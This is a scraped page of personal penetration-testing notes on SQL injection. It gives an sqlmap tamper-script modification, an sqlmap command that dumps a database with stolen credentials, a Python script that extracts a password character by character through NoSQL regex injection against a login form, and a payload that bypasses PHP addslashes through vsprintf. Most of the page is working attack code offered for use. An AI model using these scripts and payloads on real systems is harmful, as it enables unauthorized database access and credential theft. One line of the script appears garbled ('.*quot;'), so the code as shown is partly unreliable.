xct's notes
Search…
SQL Injection

SQLMap

Modify unicode encoding in "/usr/share/sqlmap/tamper/charunicodeencode.py":
1
while i < len(payload):
2
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
3
retVal += "\\u00%s" % payload[i + 1:i + 3]
4
i += 3
5
else:
6
retVal += '\\u%.4X' % ord(payload[i])
7
i += 1
Copied!

Connect with Credentials

1
sqlmap -d "mysql://<user>:<password>@<ip>/<database>" --dump
Copied!

NoSQL

Retrieve password:
1
#!/usr/bin/env python3
2
import re
3
import requests
4
import string
5
6
chars = string.ascii_letters + string.digits + string.punctuation
7
password = ""
8
url = ""
9
done = False
10
11
while not done:
12
done = True
13
for c in chars:
14
data = {
15
"username": "",
16
"password[$regex]": f"^{re.escape(password+c)}.*quot;,
17
"login": "login"
18
}
19
r = requests.post(url, data=data, allow_redirects=False)
20
if r.status_code == 302:
21
done = False
22
password += c
23
print(f"[+] Found {c}")
24
print(f"[+] Password: {password}")
Copied!

PHP addslashes bypass using vsprintf

If vsprintf is used we can send the query like this (replace * with your injection):
1
xxx%1$\%27)*
Copied!
Last modified 10mo ago